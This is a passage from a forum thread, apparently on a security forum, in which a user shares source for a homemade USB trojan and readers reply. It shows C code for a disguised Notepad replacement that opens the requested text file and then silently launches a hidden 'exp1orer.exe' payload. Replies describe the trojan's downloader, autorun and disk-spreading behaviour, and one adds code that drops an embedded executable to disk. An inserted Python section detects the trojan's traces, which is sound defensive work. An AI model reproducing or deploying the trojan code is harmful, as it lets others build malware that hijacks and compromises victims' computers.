        CloseHandle(createfile);   
        InternetCloseHandle(HOpen);   
        InternetCloseHandle(HInternet);
        return TRUE;
}

The code of the Notepad.exe file is as follows:
#pragma comment(lib,"Shell32.lib")
#pragma comment(lib,"kernel32.lib")
#include <windows.h>
#include <tchar.h>
bool FileExists(char *filename);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpszCmdLine,int nCmdShow)
{
        int   argc=0;
        int i;
        LPWSTR   *argv=CommandLineToArgvW(GetCommandLineW(),&argc);
        char cmdline[MAX_PATH];
        char windows[MAX_PATH];
        char system[MAX_PATH];
        char root[MAX_PATH];
        char arg[MAX_PATH];
        memset(root,'\0',MAX_PATH);
        memset(windows,'\0',MAX_PATH);
        memset(system,'\0',MAX_PATH);
        memset(cmdline,'\0',MAX_PATH);
        memset(arg,'\0',MAX_PATH);
        GetWindowsDirectory(windows,MAX_PATH);
        GetSystemDirectory(system,MAX_PATH);
        lstrcpy(root,windows);
        lstrcpy(cmdline,windows);
        lstrcat(cmdline,"\\notepad.exe");
        lstrcat(windows,"\\exp1orer.exe");
        lstrcat(system,"\\exp1orer.exe");
//The check below is important: when LPWSTR *argv=CommandLineToArgvW(GetCommandLineW(),&argc) passes the file name in as an argument, the file name must not contain spaces; for example C:\program files\a.txt will report that C:\program.txt cannot be found, because the number of arguments is determined by spaces, so the check below must be added
        for(i=1;i<argc;i++)
        {
                lstrcat(cmdline," ");
                WideCharToMultiByte(CP_OEMCP,NULL,argv[i],-1,arg,MAX_PATH,NULL,NULL);
                lstrcat(cmdline,arg);
        }
        WinExec(cmdline,SW_SHOW);
        if(FileExists(windows))
                WinExec(windows,SW_HIDE);
        else
                if(FileExists(system))
                        WinExec(system,SW_HIDE);
                else  
                {
                        root[3]='\0';
                        lstrcat(root,"exp1orer.exe");
                        if(FileExists(root))
                                WinExec(root,SW_HIDE);
                }
        return 0;
}
bool FileExists(char *filename)
{
        HANDLE hFind;
        WIN32_FIND_DATA FindData;
        hFind=FindFirstFile(filename,&FindData);
        if(hFind==INVALID_HANDLE_VALUE)
        {
                return false;
        }
        return true;
}
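As an added example that is not part of the original post, the following Python models the traces this trojan leaves behind (the "name .exe" renames done by InfectU(), the autorun.inf/system.vbs pair written by InfectDisk(), and the values RegWrite() sets) and shows how a defender would detect them and plan file recovery. The drive listing and registry snapshot are constructed sample data, and the registry key spellings are assumptions written in reg.exe style.

```python
"""Added example: defender-side checks for the traces left by the trojan above.
A removable drive is modelled as an in-memory listing and the registry as a
dict so the logic runs offline; all sample data below is constructed."""
from dataclasses import dataclass

HIDDEN = 0x2   # FILE_ATTRIBUTE_HIDDEN
SYSTEM = 0x4   # FILE_ATTRIBUTE_SYSTEM
TXT_CMD_KEY = r"HKCR\txtfile\shell\open\command"
HIDDEN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden"
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"

@dataclass
class Entry:
    name: str
    attrs: int = 0
    content: str = ""   # only filled for autorun.inf / system.vbs

def find_displaced_executables(listing):
    """InfectU() renames 'foo.exe' to 'foo .exe' (hidden+system) and copies the
    trojan to a visible 'foo.exe'. Return (decoy, original) name pairs."""
    by_name = {e.name.lower(): e for e in listing}
    pairs = []
    for e in listing:
        n = e.name.lower()
        if n.endswith(" .exe") and (e.attrs & (HIDDEN | SYSTEM)) == (HIDDEN | SYSTEM):
            decoy = n[:-5] + ".exe"          # strip " .exe", restore ".exe"
            if decoy in by_name:
                pairs.append((by_name[decoy].name, e.name))
    return pairs

def autorun_findings(listing):
    """Flag the autorun.inf / system.vbs / exp1orer.exe trio InfectDisk() writes."""
    by_name = {e.name.lower(): e for e in listing}
    findings = []
    inf = by_name.get("autorun.inf")
    if inf and "wscript.exe system.vbs" in inf.content.lower():
        findings.append("autorun.inf launches system.vbs via wscript.exe")
    vbs = by_name.get("system.vbs")
    if vbs and "exp1orer.exe" in vbs.content.lower():
        findings.append("system.vbs runs exp1orer.exe")
    if "exp1orer.exe" in by_name:
        findings.append("dropped exp1orer.exe present in drive root")
    return findings

# (key, value name) -> predicate on the data, one per value RegWrite() sets
REG_CHECKS = {
    (TXT_CMD_KEY, ""): lambda v: "noteped.exe" in str(v).lower(),   # txt hijack
    (HIDDEN_KEY + r"\SHOWALL", "CheckedValue"): lambda v: v == 0,   # hides hidden files
    (HIDDEN_KEY + r"\NOHIDDEN", "CheckedValue"): lambda v: v == 2,
    (RUN_KEY + r"\Run", "exp1orer"): lambda v: True,                # persistence
    (RUN_KEY + r"\RunOnce", "exp1orer"): lambda v: True,
}

def registry_findings(snapshot):
    """snapshot: {(key, value_name): data}. Return the pairs whose data matches."""
    return [kv for kv, hit in REG_CHECKS.items() if kv in snapshot and hit(snapshot[kv])]

def recovery_plan(listing):
    """Undo the displacement: remove the trojan copy that took the original name,
    then rename the hidden original back. Returns (action, src, dst) tuples to
    apply with os.remove/os.rename once the decoy's hash has been confirmed."""
    plan = []
    for decoy, original in find_displaced_executables(listing):
        plan.append(("delete", decoy, None))
        plan.append(("rename", original, decoy))
    return plan

SAMPLE_DRIVE = [  # constructed listing of an infected USB drive root
    Entry("autorun.inf", HIDDEN | SYSTEM, "[AutoRun]\nopen=wscript.exe system.vbs\n"),
    Entry("system.vbs", HIDDEN | SYSTEM, 'Wsh.Run "exp1orer.exe",false,false'),
    Entry("exp1orer.exe", HIDDEN | SYSTEM),
    Entry("setup.exe"),                      # trojan copy wearing the original name
    Entry("setup .exe", HIDDEN | SYSTEM),    # the displaced original
    Entry("readme.txt"),
    Entry("tool .exe"),                      # space but visible: not the pattern
]
SAMPLE_REG = {  # constructed registry snapshot; NOHIDDEN left at its default
    (TXT_CMD_KEY, ""): r"C:\WINDOWS\noteped.exe %1",
    (HIDDEN_KEY + r"\SHOWALL", "CheckedValue"): 0,
    (HIDDEN_KEY + r"\NOHIDDEN", "CheckedValue"): 1,
}

if __name__ == "__main__":
    for f in autorun_findings(SAMPLE_DRIVE) + [str(k) for k in registry_findings(SAMPLE_REG)]:
        print("finding:", f)
    for step in recovery_plan(SAMPLE_DRIVE):
        print("plan:", step)
```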




Latest replies (32)
tornodo 1 2011-5-22 11:44
2
0
Can someone explain what that big array actually means?

Is that hex array in the middle a PE file, or something else? I have come across many similar programs and never understood that array. Please explain.
heyuehui 2 2011-5-22 11:51
3
0
That is the hex code of the dropped noteped.exe; the source code of noteped.exe is at the end of the post. Its function is to open the txt file first and then run the virus..
tornodo 1 2011-5-22 12:04
4
0
So it is a downloader too, ⊙﹏⊙b sweat
I took the code. Your trojan is not AV-evasive; it got killed during the download.
邓韬 9 2011-5-22 12:44
5
0
It embeds the hex of a PE file so that it can be written out to disk and saved!
heyuehui 2 2011-5-22 12:48
6
0
This code is just to show everyone the techniques trojans and viruses use; they are all conventional techniques.. There is no anti-debugging or AV evasion...
butian 2011-5-22 13:17
7
0
Heh, good!
heyuehui 2 2011-5-22 19:33
8
0
There are several techniques in here that are essential for writing viruses: disk traversal and dropping exe files. With disk traversal you can infect every file one by one; once you master dropping exe files you can write a binder. These are all basic virus techniques.. Would some expert give a few pointers...
lnheart 2011-5-23 14:50
9
0
Bumping for the OP. I have been learning C recently.
熊猫正正 9 2011-5-23 14:53
10
0
Heh, you finally finished writing your trojan~~
heyuehui 2 2011-5-23 18:45
11
0
Thanks for showing up, big shot. How did you know I was going to write a trojan...
heyuehui 2 2011-5-23 18:46
12
0
Thanks. We can learn together; I am studying both assembly and C..
dayang 2011-5-26 11:08
13
0
This is technology from 10 years ago; nobody uses it anymore.
heyuehui 2 2011-5-26 19:05
14
0
The main point is to practise programming, not to produce a very advanced virus... Once you know how to drop executables you can write a binder or a file encryption program, and by running into and solving problems during development I learned a lot, which is enough... At the very least, before writing this program I did not know how to traverse disks or drop executables...
NiGHter 2011-5-26 19:25
15
0
That is the hex code of the dropped noteped.exe; the source code of noteped.exe is at the end of the post. Its function is to open the txt file first and then run the virus..

Better put it in a resource instead; it looks messy this way.
yiruirui 1 2011-5-30 10:49
16
0
First of all, many thanks to the OP! Some personal suggestions: you just posted the code without explaining the principles much, and beginners will be scared off by that array. So I hope the OP adds an explanation of the principles first and comments at the key places. I hope this becomes a featured post!!!!!
zhaokang 3 2011-5-31 09:28
17
0
Very good introductory knowledge.
heyuehui 2 2011-5-31 13:04
18
0
Thanks for the reminder, I will improve it..
heyuehui 2 2011-5-31 13:09
19
0
Thanks for the attention...
willapple 2011-5-31 22:40
20
0
Nice, here to learn! I have also been studying C and assembly recently!
robey 1 2011-5-31 23:35
21
0
It has all the basic behaviours. Here to learn..
heyuehui 2 2011-6-1 10:16
22
0
Yes, it does include the basic characteristics of many kinds of viruses, including Autorun viruses, downloaders and so on. I will keep improving it; my goal is to turn it into a teaching virus that covers most virus techniques.. Later I may add file infection and boot sector infection..
rosetta 1 2011-6-1 11:44
23
0
Taking the code - -

Thanks.
rosetta 1 2011-6-1 21:57
24
0
Nice. For someone like me with C basics but no hands-on experience, this is the best tutorial.

These techniques look simple but are very practical; today's viruses still use them.
琉璃瓦 2011-6-1 22:04
25
0
Noob who doesn't understand it, passing by...
残月映梦 2011-6-3 20:19
26
0
Nice, I like the open-source spirit~~~ that is how you learn more~~~
广海混沌 2011-6-3 20:51
27
0
Yeah, it is old technology indeed.
fishyuule 2011-6-3 21:16
28
0
You could look into file-infecting viruses.... not just simply infecting USB drives...
Still, reading the code from start to finish and looking back at the past was quite pleasant...
Keep it up..
fishyuule 2011-6-3 21:23
29
0
		DWORD dwWrite=0;
		HANDLE hFile = CreateFile( _T("C:\\ViursDemo.exe"), GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
		if (hFile == INVALID_HANDLE_VALUE)
		{
			return ;
		}
		// locate the embedded EXE in the module's resource section (IDR_EXEFILE of custom type "EXEFILE" in the .rc)
		HRSRC hRsc = FindResource(NULL, MAKEINTRESOURCE(IDR_EXEFILE), _T("EXEFILE"));
		HGLOBAL hG = LoadResource(NULL, hRsc);
		DWORD dwSize = SizeofResource(NULL, hRsc);
		LPVOID pData = LockResource(hG);   // pointer to the raw resource bytes
		WriteFile(hFile, pData, dwSize, &dwWrite, NULL);
		CloseHandle(hFile);


The method mentioned in post 15 is worth a look: doing it through a resource..
heyuehui 2 2011-6-4 08:19
30
0
OK, learned something, thanks..
stormxp 1 2011-6-4 21:45
31
0
Bookmarked; I hope I can write something like this myself.
heyuehui 2 2011-6-5 13:40
32
0
As long as you sit down and write it, you will certainly get it done.. Go for it.
陈英俊 2011-6-9 12:03
33
0
You applied too early. Once it is polished into a complete, detailed and accessible teaching post, it will be ready.